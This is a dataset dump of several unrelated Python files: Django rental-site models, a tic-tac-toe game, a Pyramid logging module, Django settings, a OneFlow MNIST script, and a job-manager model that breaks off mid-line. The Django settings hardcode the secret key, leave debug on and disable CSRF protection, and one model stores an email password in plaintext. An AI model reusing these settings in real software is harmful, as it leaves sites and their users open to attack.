title = models.CharField(max_length=255, unique=True, blank=False, null=False)\n description = models.TextField(blank=True, null=True)\n created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = \"fuels\"\n verbose_name_plural = \"Fuels\".upper()\n ordering = (\"title\",)\n\n\n# class Owner(models.Model):\n# user = models.OneToOneField(User, on_delete=models.CASCADE)\n# phone = models.CharField(max_length=20, blank=False, null=False)\n# country = CountryField(blank=False, null=False)\n# city = models.CharField(max_length=100, blank=False, null=False)\n# address = models.CharField(max_length=255, blank=False, null=False)\n# image = models.ImageField(upload_to='rental_exchange/owner_images', null=True, blank=True)\n# created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n# created_at = models.DateTimeField(auto_now_add=True)\n# updated_at = models.DateTimeField(auto_now=True)\n# updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n#\n# def __str__(self):\n# return self.user\n#\n# class Meta:\n# db_table = \"owners\"\n# verbose_name_plural = \"Owners\".upper()\n# ordering = (\"id\",)\n\n\n# class Customer(models.Model):\n# user = models.OneToOneField(User, on_delete=models.CASCADE)\n# phone = models.CharField(max_length=20, blank=False, null=False)\n# country = CountryField(blank=False, null=False)\n# city = models.CharField(max_length=100, blank=False, null=False)\n# address = models.CharField(max_length=255, blank=False, null=False)\n# image = models.ImageField(upload_to='rental_exchange/customer_images', null=True, blank=True)\n# created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n# created_at = models.DateTimeField(auto_now_add=True)\n# updated_at = models.DateTimeField(auto_now=True)\n# updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n#\n# def __str__(self):\n# return self.user\n#\n# class Meta:\n# db_table = \"customers\"\n# verbose_name_plural = \"Customers\".upper()\n\n\nclass Blog(models.Model):\n title = models.CharField(max_length=255, blank=False, null=False)\n short_description = models.TextField(blank=False, null=False)\n description = models.TextField(blank=False, null=False)\n created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = \"blogs\"\n verbose_name_plural = \"Blogs\".upper()\n ordering = (\"-created_at\",)\n\n\nclass Comment(models.Model):\n comment = models.TextField(blank=False, null=False)\n blog = models.ForeignKey('Blog', on_delete=models.CASCADE, blank=True, null=True)\n created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n\n def __str__(self):\n return self.comment\n\n class Meta:\n db_table = \"comments\"\n verbose_name_plural = \"Comments\".upper()\n ordering = (\"created_at\",)\n\n\nclass Contact(models.Model):\n name = models.CharField(max_length=255, blank=False, null=False)\n email = models.EmailField(max_length=255, blank=False, null=False)\n subject = models.CharField(max_length=255, blank=False, null=False)\n message = models.TextField(blank=False, null=False)\n is_seen = models.BooleanField(default=False)\n customer = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.email\n\n class Meta:\n db_table = \"contacts\"\n verbose_name_plural = \"Contacts\".upper()\n ordering = (\"created_at\",)\n\n\nclass System(models.Model):\n site_title = models.CharField(max_length=255, default='Rental Exchange', blank=False, null=False)\n site_logo = models.ImageField(upload_to='rental_exchange/system', blank=False, null=False)\n contact_email = models.EmailField(max_length=255, blank=False, null=False)\n contact_phone = models.CharField(max_length=20, blank=False, null=False)\n contact_address = models.CharField(max_length=255, blank=False, null=False)\n email_from = models.EmailField(max_length=255, blank=False, null=False)\n email_from_password = models.CharField(max_length=255, blank=False, null=False)\n email_to = models.EmailField(max_length=255, blank=False, null=False)\n map_url = models.URLField(blank=False, null=False, verbose_name='Map')\n facebook_url = models.URLField(blank=False, null=False, verbose_name='Facebook')\n twitter_url = models.URLField(blank=False, null=False, verbose_name='Twitter')\n instagram_url = models.URLField(blank=False, null=False, verbose_name='Instagram')\n copyright_owner = models.CharField(max_length=100, blank=False, null=False)\n copyright_year = models.IntegerField(\n validators=[MinValueValidator(1984), MaxValueValidator(datetime.date.today().year)], blank=False)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n\n class Meta:\n db_table = \"systems\"\n verbose_name_plural = \"Systems\".upper()\n\n\nclass CarRegistrationRequest(models.Model):\n client_name = models.CharField(max_length=100, null=False, blank=False, verbose_name='Your Name')\n client_email = models.EmailField(max_length=100, null=False, blank=False, verbose_name='Email')\n client_phone = models.CharField(max_length=20, blank=False, null=False, verbose_name='Phone')\n client_address = models.CharField(max_length=255, blank=True, null=True, verbose_name='Address')\n car_title = models.CharField(max_length=255, null=False, blank=False, verbose_name='Car Title')\n car_model = models.CharField(max_length=50, null=False, blank=False, verbose_name='Car Model')\n model_year = models.IntegerField(validators=[MinValueValidator(1984), MaxValueValidator(datetime.date.today().year)], blank=False)\n message = models.TextField(null=True, blank=True)\n is_contacted = models.BooleanField(default=False)\n is_seen = models.BooleanField(default=False)\n created_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return '%s (%s)' %(self.client_name, self.client_email)\n\n class Meta:\n db_table = \"car_registration_requests\"\n verbose_name_plural = \"Car Registration Requests\".upper()\n ordering = (\"-created_at\",)\n\n\nclass CarBooking(models.Model):\n REQUEST_STATUS = [\n ('Pending', 'Pending'),\n ('Accepted', 'Accepted'),\n ('Rejected', 'Rejected')\n ]\n RENT_STATUS = [\n ('On Going', 'On Going'),\n ('Closed', 'Closed')\n ]\n PAYMENT_STATUS = [\n ('Paid', 'Paid'),\n ('Unpaid', 'Unpaid')\n ]\n RENT_FOR = [\n ('3', '3 Months'),\n ('4', '4 Months'),\n ('5', '5 Months'),\n ('6', '6 Months'),\n ('7', '7 Months'),\n ('8', '8 Months'),\n ('9', '9 Months'),\n ('10', '10 Months'),\n ('11', '11 Months'),\n ('12', '12 Months')\n ]\n car = models.ForeignKey('Car', on_delete=models.CASCADE, null=False, blank=False)\n customer = models.ForeignKey(User, on_delete=models.CASCADE, null=False, blank=False, related_name=\"+\")\n start_date = models.DateField(blank=False, null=False)\n rent_for = models.CharField(max_length=50, choices=RENT_FOR, blank=False, null=False)\n rental_cost = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n is_seen = models.BooleanField(default=False, blank=True)\n request_status = models.CharField(max_length=50, choices=REQUEST_STATUS, default='Pending', blank=True)\n rent_status = models.CharField(max_length=50, choices=RENT_STATUS, blank=True, null=True)\n payment_status = models.CharField(max_length=50, choices=PAYMENT_STATUS, default='Unpaid', blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n\n def __str__(self):\n return '%s' %(self.car)\n\n class Meta:\n db_table = \"car_booking\"\n verbose_name_plural = \"Car Bookings\".upper()\n ordering = (\"-created_at\",)\n\n def get_remaining_days(self):\n start_date = self.start_date\n end_date = start_date + relativedelta(months=int(self.rent_for))\n date_difference = end_date - start_date\n return '%d Days' % date_difference.days\n\n\nclass PaymentHistory(models.Model):\n PAYMENT_METHODS = [\n ('Hand Cash', 'Hand Cash'),\n ('PayPal', 'PayPal')\n ]\n booking = models.OneToOneField('CarBooking', on_delete=models.CASCADE, null=False, blank=False)\n payment_method = models.CharField(max_length=50, choices=PAYMENT_METHODS, default='Hand Cash')\n amount = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n transaction_id = models.CharField(max_length=255, blank=True, null=True)\n payment_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.booking\n\n class Meta:\n db_table = \"payment_history\"\n verbose_name_plural = \"Payment History\".upper()\n ordering = (\"-payment_date\",)\n\n\nclass TransactionHistory(models.Model):\n booking = models.ForeignKey('CarBooking', on_delete=models.CASCADE, blank=False, null=False)\n added_amount = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n is_paid = models.BooleanField(default=False)\n created_at = models.DateTimeField(auto_now_add=True)\n paid_date = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.booking.car.owner\n\n class Meta:\n db_table = \"transaction_history\"\n verbose_name_plural = \"Transaction History\".upper()\n ordering = (\"-created_at\",)\n\n\nclass VehicleOwnerAccount(models.Model):\n account_holder = models.OneToOneField(User, on_delete=models.CASCADE, null=False, blank=False)\n total_income = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n last_added_amount = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.account_holder\n\n class Meta:\n db_table = \"vehicle_owner_account\"\n verbose_name_plural = \"Vehicle Owner Accounts\".upper()\n ordering = (\"account_holder\",)","sub_path":"rental_exchange/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"451482406","text":"# TICTACTOE \n# from IPython.display import clear_output\n# 'clear_output()' works in juypter notebook\n\n\nimport random\nimport os\n\n# Function to display the board\n# Based on the numpad of a keyboard where the numbers represent the positions of a player's marker\n \ndef display_board(board): # Prints and update the board at each input from the player\n os.system('clear') # To clear the output screen each time a input is taken and show the updated table \n print('_'+board[7]+'_|_'+board[8]+'_|_'+board[9]+'_')\n print('_'+board[4]+'_|_'+board[5]+'_|_'+board[6]+'_')\n print('_'+board[1]+'_|_'+board[2]+'_|_'+board[3]+'_')\n\n# Function to take the player markers\ndef player_input(): # Player chooses his marker and the second player automatically gets the remaining marker\n\n marker = ''\n \n while marker != 'X' and marker != 'O': \n marker=input(\"Player1 choose 'X' or 'O': \").upper()\n \n Player1_marker=marker\n \n if Player1_marker=='X': # If Player 1 chooses 'X' second player gets 'O'\n Player2_marker='O'\n return ('X','O') # For later use through tuple unpacking \n \n else:\n Player2_marker='X' \n return ('O','X') # For later use through tuple unpacking\n\n# Function to place the marker\ndef place_marker(board, marker, position):\n\n board[position]=marker\n \n \n# Function to check for a Win\ndef win_check(board, mark):\n\n\t# Checking Conditions in all directions\n if ((board[1]==board[2]==board[3]==mark) or \n (board[4]==board[5]==board[6]==mark) or \n (board[7]==board[8]==board[9]==mark) or \n (board[1]==board[4]==board[7]==mark) or \n (board[2]==board[5]==board[8]==mark) or \n (board[3]==board[6]==board[9]==mark) or \n (board[1]==board[5]==board[9]==mark) or \n (board[3]==board[5]==board[7]==mark)):\n return True\n\n# Function to select a random player to go first\ndef choose_first():\n if random.randint(1,2)==1:\n return 'Player1'\n else:\n return 'Player2'\n\n# Function to check whether enetred position is empty or not\ndef space_check(board, position):\n \n if board[position]==' ':\n return True\n else: \n return False\n \n# Function to check for a draw\ndef full_board_check(board):\n for i in range(1,10):\n if space_check(board, i):\n return False\n return True\n\n# Function to ask players for the position of the maker\ndef player_choice(board):\n position = 0\n while position not in [1,2,3,4,5,6,7,8,9] or not space_check(board, position):\n position = int(input('Choose your next position: (1-9) '))\n return position\n \n \n# ASK PLAYER WHETHER THEY WANNA PLAY AGAIN \ndef replay():\n return input('Do you want to play again? Enter Yes or No: ').upper().startswith('Y')\n \n \n# MAIN CODE \nprint('Welcome to Tic Tac Toe!')\n\nwhile True:\n # Basic Working\n The_board=[' ']*10 \n Player1_marker,Player2_marker=player_input() # To get the players markers and assign it to repective players through tuple unpacking\n \n turn=choose_first() # To choose a random player to go first\n print('{} will go first'.format(turn)) #prints which player will go first\n \n play_game=input('Are you ready to play the game: Enter YES or NO- ').upper() # Asks player if ready or not and starts the game if ready \n if play_game=='YES':\n game_on=True\n else:\n game_on=False\n \n while game_on:\n \n if turn=='Player1': # Checks if it's player 1 turn \n \n display_board(The_board) # Prints the empty board\n \n position=player_choice(The_board) # Takes the input of player 1 from the numpad\n \n place_marker(The_board, Player1_marker, position) # Places the marker of Player 1 on board \n \n if(win_check(The_board,Player1_marker)): # Checks for a win\n display_board(The_board)\n print('Congratulations! Player 1 you have won the game!')\n game_on = False # Breaks out of the loop\n \n else:\n \n if full_board_check(The_board): # Checks for a draw\n display_board(The_board)\n print('The game is a draw!')\n break\n \n else:\n turn='Player2' # Turn changes if none of the conditions above are satisfied\n \n else:\n display_board(The_board) # Prints the empty board \n \n position=player_choice(The_board) # Takes the input of player 1 from the numpad\n \n place_marker(The_board, Player2_marker, position) # Places the marker of Player 2 on board\n \n if(win_check(The_board,Player2_marker)):\n display_board(The_board)\n print('Congratulations! Player 2 you have won the game!')\n game_on = False\n \n else:\n \n if full_board_check(The_board):\n display_board(The_board)\n print('The game is a draw!')\n break\n \n else:\n turn='Player1'\n \n if not replay(): # Asks player it they want to play again and if input is no breaks out of the loop\n break\n","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"275690395","text":"\"\"\"\nInstall a filter on the logging handler to add some info about requests:\n * client_addr\n * method\n * matched_route\n * path\n\nA pyramid event handler is installed to setup this filter for the current request.\n\"\"\"\nimport json\nimport logging\nimport logging.config\nimport os\nimport socket\nimport sys\nfrom typing import Any, MutableMapping, Mapping, IO, Optional\n\nimport cee_syslog_handler\nfrom pyramid.threadlocal import get_current_request\n\n\nclass _PyramidFilter(logging.Filter):\n \"\"\"\n A logging filter that adds request information to CEE logs.\n \"\"\"\n\n def filter(self, record: Any) -> bool:\n request = get_current_request()\n if request is not None:\n record.client_addr = request.client_addr\n record.method = request.method\n if request.matched_route is not None:\n record.matched_route = request.matched_route.name\n record.path = request.path\n record.request_id = request.c2c_request_id\n record.level_name = record.levelname\n return True\n\n\n_PYRAMID_FILTER = _PyramidFilter()\n\n\ndef _un_underscore(message: MutableMapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"\n Elasticsearch is not indexing the fields starting with underscore and cee_syslog_handler is starting\n a lot of interesting fields with underscore. Therefore, it's a good idea to remove all those underscore\n prefixes.\n \"\"\"\n for key, value in list(message.items()):\n if key.startswith(\"_\"):\n new_key = key[1:]\n if new_key not in message:\n del message[key]\n message[new_key] = value\n return message\n\n\ndef _rename_field(dico: MutableMapping[str, Any], source: str, dest: str) -> None:\n if source in dico:\n dico[dest] = dico[source]\n del dico[source]\n\n\ndef _make_message_dict(*args: Any, **kargv: Any) -> Mapping[str, Any]:\n \"\"\"\n patch cee_syslog_handler to rename message->full_message otherwise this part is dropped by syslog.\n \"\"\"\n msg = cee_syslog_handler.make_message_dict(*args, **kargv)\n if msg[\"message\"] != msg[\"short_message\"]:\n # only output full_message if it's different from short message\n msg[\"full_message\"] = msg[\"message\"]\n msg[\"full_msg\"] = \"true\"\n del msg[\"message\"]\n\n # make the output more consistent with the one from java\n _rename_field(msg, \"short_message\", \"msg\")\n _rename_field(msg, \"facility\", \"logger_name\")\n\n return _un_underscore(msg)\n\n\nclass PyramidCeeSysLogHandler(cee_syslog_handler.CeeSysLogHandler): # type: ignore\n \"\"\"\n A CEE (JSON format) log handler with additional information about the current request.\n \"\"\"\n\n def __init__(self, *args: Any, **kargv: Any) -> None:\n super().__init__(*args, **kargv)\n self.addFilter(_PYRAMID_FILTER)\n\n def format(self, record: Any) -> str:\n message = _make_message_dict(\n record,\n self._fqdn,\n self._debugging_fields,\n self._extra_fields,\n self._facility,\n self._static_fields,\n )\n return \": @cee: %s\" % json.dumps(message)\n\n\nclass JsonLogHandler(logging.StreamHandler):\n \"\"\"\n Log to stdout in JSON.\n \"\"\"\n\n def __init__(self, stream: Optional[IO[str]] = None):\n super().__init__(stream)\n self.addFilter(_PYRAMID_FILTER)\n self._fqdn = socket.getfqdn()\n\n def format(self, record: Any) -> str:\n message = _make_message_dict(\n record, self._fqdn, debugging_fields=True, extra_fields=True, facility=None, static_fields={}\n )\n return json.dumps(message)\n\n\ndef init(configfile: Optional[str] = None) -> Optional[str]:\n logging.captureWarnings(True)\n configfile_ = (\n configfile if configfile is not None else os.environ.get(\"C2CWSGIUTILS_CONFIG\", \"/app/production.ini\")\n )\n if os.path.isfile(configfile_):\n logging.config.fileConfig(configfile_, defaults=dict(os.environ))\n return configfile_\n else:\n level = os.environ.get(\"LOG_LEVEL\", os.environ.get(\"OTHER_LOG_LEVEL\", \"INFO\"))\n if os.environ.get(\"LOG_TYPE\") == \"json\":\n root = logging.getLogger()\n handler = JsonLogHandler(stream=sys.stdout)\n handler.setLevel(logging.NOTSET)\n root.addHandler(handler)\n root.setLevel(level)\n else:\n logging.basicConfig(\n level=level, format=\"%(asctime)-15s %(levelname)5s %(name)s %(message)s\", stream=sys.stderr\n )\n return None\n","sub_path":"c2cwsgiutils/pyramid_logging.py","file_name":"pyramid_logging.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"336739213","text":"\"\"\"\nDjango settings for Billiards project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\nfrom datetime import date,datetime\nimport time\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'o*3%q#@)ez#uuwgg5%7qbz+(=f50noqkm5@cw2p-rw37@k&!l#'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'app',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n #'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'Billiards.urls'\n\nWSGI_APPLICATION = 'Billiards.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n#database mongo\nDB_NAME = 'Billiards'\nDB_IP_ADDRESS = '127.0.0.1'\nDB_PORT = 27017\nADMINS_COLLECTION = 'admins_collection'\nGOODS_COLLECTION = 'goods_collection'\nUSERS_COLLECTION = 'users_collection'\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(os.path.dirname(__file__),'../web/resource').replace('\\\\','/'),\n '/var/www/static/',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(os.path.dirname(__file__),'../web/templates').replace('\\\\','/')\n)\n\nFILE_UPLOAD_TEMP_DIR = (\n os.path.join(os.path.dirname(__file__),'../temp').replace('\\\\','/')\n)\n\n#DEFAULT_GOODS_ID = str(date.today().year) + str(date.today().month) + str(date.today().day)\ntemp = str(datetime.now())\n_id = ''\nmark = [':',' ','-','.']\nfor t in temp:\n if t not in mark:\n _id = _id + t\nDEFAULT_GOODS_ID = _id\nprint(STATICFILES_DIRS)\nprint(TEMPLATE_DIRS)\nprint(FILE_UPLOAD_TEMP_DIR)\nprint(DEFAULT_GOODS_ID)","sub_path":"Billiards/billiards/Billiards/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"124983331","text":"#!/usr/bin/env python\n#_*_coding:utf-8 _*_\n__author__ = \"SmartGo\"\n\n#l = []\n# name = input(\"please your name:\")\n# l.append(name)\n#\n# print(l)\n# total = item_one + \\\n# item_two + \\\n# item_three\na = 'hello'\nb = 'j'\nc = 'ls'\nret = a + \\\n b + \\\n c\nprint(ret)","sub_path":"c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"87859674","text":"from mnist_util import load_data\nimport oneflow as flow\nimport oneflow.typing as oft\n\nBATCH_SIZE = 100\n\n\ndef mlp(data):\n initializer = flow.truncated_normal(0.1)\n reshape = flow.reshape(data, [data.shape[0], -1])\n hidden = flow.layers.dense(reshape, 512, activation=flow.nn.relu, kernel_initializer=initializer)\n return flow.layers.dense(hidden,\n 10,\n kernel_initializer=initializer,\n # dense为列存储,进行split(0)切分\n model_distribute=flow.distribute.split(axis=0)\n )\n\n\ndef get_train_config():\n config = flow.function_config()\n config.default_data_type(flow.float)\n config.train.primary_lr(0.1)\n config.train.model_update_conf({\"naive_conf\": {}})\n config.default_distribute_strategy(flow.distribute.consistent_strategy())\n\n return config\n\n\n@flow.global_function(get_train_config())\ndef train_job(images:oft.Numpy.Placeholder((BATCH_SIZE, 1, 28, 28), dtype=flow.float),\n labels:oft.Numpy.Placeholder((BATCH_SIZE,), dtype=flow.int32)):\n logits = mlp(images)\n loss = flow.nn.sparse_softmax_cross_entropy_with_logits(labels, logits, name=\"softmax_loss\")\n flow.losses.add_loss(loss)\n return loss\n\n\nif __name__ == '__main__':\n flow.config.gpu_device_num(2)\n check_point = flow.train.CheckPoint()\n check_point.init()\n\n (train_images, train_labels), (test_images, test_labels) = load_data(BATCH_SIZE)\n\n for epoch in range(3):\n for i, (images, labels) in enumerate(zip(train_images, train_labels)):\n def callback(loss):\n if i % 20 == 0: print(loss.mean())\n\n\n loss = train_job(images, labels).async_get(callback)\n","sub_path":"en/docs/code/extended_topics/mixed_parallel_mlp.py","file_name":"mixed_parallel_mlp.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"136429629","text":"\"\"\"In-memory implementation of model adapter. Only works when you have a single\nclient using the master. Useful for testing and as a base class for versions\nof the model that load the entire db into memory (e.g. json_model).\n\"\"\"\n\nimport copy\n\nfrom common import *\nimport fix_path\nimport dist_job_mgr.model as model\nfrom dist_job_mgr.model import ModelError\n\nclass NodeUniquenessError(Exception):\n pass\n\nclass StaleRefError(Exception):\n \"\"\"This exception is thrown when the client attempts to reference\n an object that was from an aborted transaction.\n \"\"\"\n pass\n\ndef check_inc(me, other):\n if me.incarnation!=other.incarnation:\n msg = \"Attempt to reference a stale object from an aborted transaction. %s of type %s has incarnation %d, while %s of type %s has incarnation %d\" % \\\n (me, type(me), me.incarnation,\n other, type(other), other.incarnation)\n raise StaleRefError(msg)\n\n\nclass NodeDb(object):\n def __init__(self):\n self.by_name = {}\n self.by_hostname = {}\n self.by_public_ip = {}\n self.by_private_ip = {}\n\n def add_node(self, node):\n if self.by_name.has_key(node.name):\n raise NodeUniquenessError(\"Cannot create node %s, a node with that name already exists\" % node.name)\n if node.hostname and self.by_hostname.has_key(node.hostname):\n raise NodeUniquenessError(\"Cannot create node %s because node %s already has the same hostname %s\" %\n (node.name, self.by_hostname[node.hostname],\n node.hostname))\n if node.public_ip and self.by_public_ip.has_key(node.public_ip):\n raise NodeUniquenessError(\"Cannot create node %s because node %s already has the same public ip address %s\" %\n (node.name, self.by_public_ip[node.public_ip],\n node.public_ip))\n if node.private_ip and self.by_private_ip.has_key(node.private_ip):\n raise NodeUniquenessError(\"Cannot create node %s because node %s already has the same public ip address %s\" %\n (node.name, self.by_private_ip[node.private_ip],\n node.public_ip))\n self.by_name[node.name] = node\n if node.hostname: self.by_hostname[node.hostname] = node\n if node.public_ip: self.by_public_ip[node.public_ip] = node\n if node.private_ip: self.by_private_ip[node.private_ip] = node\n\n def find_node(self, name=None, hostname=None, public_ip=None,\n private_ip=None):\n def val_or_none(map, key):\n if map.has_key(key):\n return map[key]\n else:\n return None\n if name:\n return val_or_none(self.by_name, name)\n elif hostname:\n return val_or_none(self.by_hostname, hostname)\n elif public_ip:\n return val_or_none(self.by_public_ip, public_ip)\n elif private_ip:\n return val_or_none(self.by_private_ip, private_ip)\n else:\n raise Exception(\"Must specify one of name, hostname, public_ip, or private_ip\")\n\n def get_by_name(self, name):\n return self.by_name[name]\n \n def remove_node(self, node):\n assert self.by_name.has_key(node.name)\n del self.by_name[node.name]\n if node.hostname: del self.by_hostname[node.hostname]\n if node.public_ip: del self.by_public_ip[node.public_ip]\n if node.private_ip: del self.by_private_ip[node.private_ip]\n\n def get_all_nodes(self):\n return self.by_name.values()\n\nclass JobDb(object):\n def __init__(self):\n self.jobs_by_name = {}\n self.jobs_by_id = {}\n self.next_id_for_name = {}\n\n def get_id_for_job(self, job_name):\n if not self.next_id_for_name.has_key(job_name):\n self.next_id_for_name[job_name] = 2\n return \"%s-%d\" % (job_name, 1)\n else:\n job_id = self.next_id_for_name[job_name]\n self.next_id_for_name[job_name] = job_id + 1\n return \"%s-%d\" % (job_name, job_id)\n\n def has_job(self, job_id):\n return self.jobs_by_id.has_key(job_id)\n \n def add_job(self, job):\n assert not self.jobs_by_id.has_key(job.job_id)\n self.jobs_by_id[job.job_id] = job\n if self.jobs_by_name.has_key(job.name):\n self.jobs_by_name[job.name].append(job)\n else:\n self.jobs_by_name[job.name] = [job,]\n\n def delete_job(self, job):\n assert self.jobs_by_id.has_key(job.job_id)\n del self.jobs_by_id[job.job_id]\n l = self.jobs_by_name[job.name]\n for i in range(len(l)):\n if l[i] == job:\n del l[i]\n return\n assert 0\n\n def query_jobs(self, job_id=None, job_name=None,\n pool_name=None):\n if job_id:\n if self.jobs_by_id.has_key(job_id):\n return [self.jobs_by_id[job_id],]\n else:\n return []\n elif job_name:\n if self.jobs_by_name.has_key(job_name):\n return [job for job in self.jobs_by_name[job_name]]\n else:\n return []\n elif pool_name:\n results = []\n for job in self.jobs_by_id.values():\n if job.node_pool and job.node_pool.name==pool_name:\n results.append(job)\n return results\n else:\n return [job for job in self.jobs_by_id.values()]\n \n\nclass CompareError(Exception):\n def __init__(self, current_has, other_has):\n Exception.__init__(self, \"State.compare(): Current state has %s, other state has %s\" % (current_has, other_has))\n\n\nclass State(object):\n def __init__(self):\n self.pools = {}\n self.all_nodes = NodeDb()\n self.jobs = JobDb()\n self.locked_objects = []\n self.incarnation = 1\n\n def has_locked_objects(self):\n return len(self.locked_objects)>0\n \n def lock_object(self, obj):\n assert obj.locked==False\n obj.locked = True\n self.locked_objects.append(obj)\n \n def unlock_all(self):\n for obj in self.locked_objects:\n obj.locked = False\n self.locked_objects = []\n\n def inc_incarnation(self, model):\n assert len(self.locked_objects)==0\n hwm = max(model.incarnation_hwm, self.incarnation)\n self.incarnation = hwm + 1\n model.incarnation_hwm = self.incarnation\n for pool in self.pools.values():\n pool.incarnation = self.incarnation\n for node in self.all_nodes.get_all_nodes():\n node.incarnation = self.incarnation\n for job in self.jobs.jobs_by_id.values():\n job.incarnation = self.incarnation\n for task in job.tasks:\n task.incarnation = self.incarnation\n\n def copy(self, model):\n \"\"\"Create a deep copy of the state, but ensure that everything points\n to the original model.\n \"\"\"\n cpy = copy.deepcopy(self)\n for node in cpy.all_nodes.by_name.values():\n node.model = model\n for pool in cpy.pools.values():\n pool.model = model\n return cpy\n\n def compare(self, other_state, should_have_same_incarnation=True):\n \"\"\"Compare two instances of the state object and throw an exception\n if they are different. Useful for testing.\n \"\"\"\n def check_inc(state, obj):\n if obj.incarnation != state.incarnation:\n raise Exception(\"State.compare(): object %s has incarnation %d while state has incarnation %d\" %\n (obj, obj.incarnation, state.incarnation))\n def ref_field_to_str(reference, attribute):\n if reference==None:\n return \"None\"\n elif not hasattr(reference, attribute):\n raise Exception(\"Object of type %s, missing field %s\" %\n (type(reference), attribute))\n else:\n return getattr(reference, attribute)\n def compare_fields(obj, ref_type, my, other, attribute):\n mfv = ref_field_to_str(my, attribute)\n ofv = ref_field_to_str(other, attribute)\n if mfv != ofv:\n raise 